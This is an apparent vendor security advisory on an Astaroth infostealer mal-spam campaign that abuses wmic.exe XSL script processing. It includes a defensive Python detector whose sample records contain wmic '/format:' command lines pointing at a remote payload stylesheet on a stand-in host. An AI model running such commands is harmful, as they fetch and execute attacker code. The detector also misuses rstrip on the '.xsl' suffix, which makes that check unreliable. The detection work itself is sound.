LTS Secure Warning: New Mal-Spam Campaign Identified Delivering Infostealer.Astaroth With Advanced Evasion Techniques
A new version of the Astaroth malware has surfaced again and is making use of native Microsoft tools to evade common security solutions. Attackers are using mal-spam campaigns that mostly target users in Brazil and European countries.
Technical Details
The trojan makes its way onto the compromised computer via a .zip file attached to a spam email. Once the .zip is downloaded and extracted, it presents an .lnk file that, when opened, starts the infection process. The process uses wmic.exe to initiate an XSL script processing attack. This allows the malware to communicate with a remote C&C server and send sensitive/personal information from the infected machine to the attacker.
The XSL file additionally contains highly obfuscated code that can carry out further malicious activity and helps the malware stay hidden from anti-virus products.
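The wmic.exe XSL script processing technique described above leaves a recognisable trace in process-creation telemetry: wmic.exe is launched with a /format: argument that points at a caller-supplied stylesheet (a URL or a file path) instead of one of the formatting names wmic ships with. The following detection routine is an added example written for this page, not code from LTS Secure or from the malware; the log records it runs over are constructed samples, and the list of built-in wmic format names is a partial list assumed for illustration.

```python
import re

# Constructed sample process-creation records (image path + command line).
# These are illustrative only, not telemetry from a real infection.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic os get /format:"https://example.invalid/payload.xsl"'},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r"wmic process list /format:csv"},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r"wmic computersystem get /FORMAT:C:\Users\Public\up.xsl"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe readme.xsl"},
]

# Format names that wmic resolves to its own stylesheets in %WINDIR%\System32\wbem.
# Assumed partial list for this example; extend it from the wmic documentation
# before using the rule in production.
BUILTIN_FORMATS = {
    "csv", "hform", "htable", "list", "mof", "rawxml",
    "table", "textvaluelist", "value", "xml",
}

# Matches "/format:<value>" with optional quoting, case-insensitive.
FORMAT_ARG = re.compile(r'/format:\s*"?([^"\s]+)"?', re.IGNORECASE)


def is_suspicious_wmic(image: str, cmdline: str) -> bool:
    """Return True when wmic.exe is asked to apply a stylesheet it did not ship with."""
    if not image.lower().endswith("wmic.exe"):
        return False
    match = FORMAT_ARG.search(cmdline)
    if match is None:
        return False
    fmt = match.group(1).strip().lower()
    # A URL or an explicit path means the stylesheet is caller-controlled.
    if "://" in fmt or "\\" in fmt or "/" in fmt:
        return True
    # A bare name is only benign if it is one of wmic's own formats.
    return fmt.rstrip(".xsl") not in BUILTIN_FORMATS if fmt.endswith(".xsl") else fmt not in BUILTIN_FORMATS


def find_suspicious(events):
    """Return the indices of records that match the XSL-processing heuristic."""
    return [i for i, ev in enumerate(events)
            if is_suspicious_wmic(ev["image"], ev["cmdline"])]


if __name__ == "__main__":
    for idx in find_suspicious(SAMPLE_EVENTS):
        print("suspicious wmic invocation:", SAMPLE_EVENTS[idx]["cmdline"])
```

The rule deliberately keys on the argument rather than on a specific stylesheet name or domain, since the campaign's file names and C&C hosts change between waves while the wmic.exe /format: mechanism itself does not. Pair it with the parent-process context (an .lnk launched from an extracted archive) to reduce false positives from legitimate administrative scripts.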
Impact
- Logs the user's keystrokes.
- Prevents operating system calls.
- Gathers information saved to the clipboard.
- Steals sensitive/confidential information such as login credentials for banking sites, cookies, etc.
Recommended Actions
- Never download suspicious attachments or click on shady-looking links.
- Make the effort to educate your users on how to identify mal-spam.
- Avoid downloading and using freeware applications.
- Always keep your anti-virus software updated to the latest release.
- Run a periodic full system scan.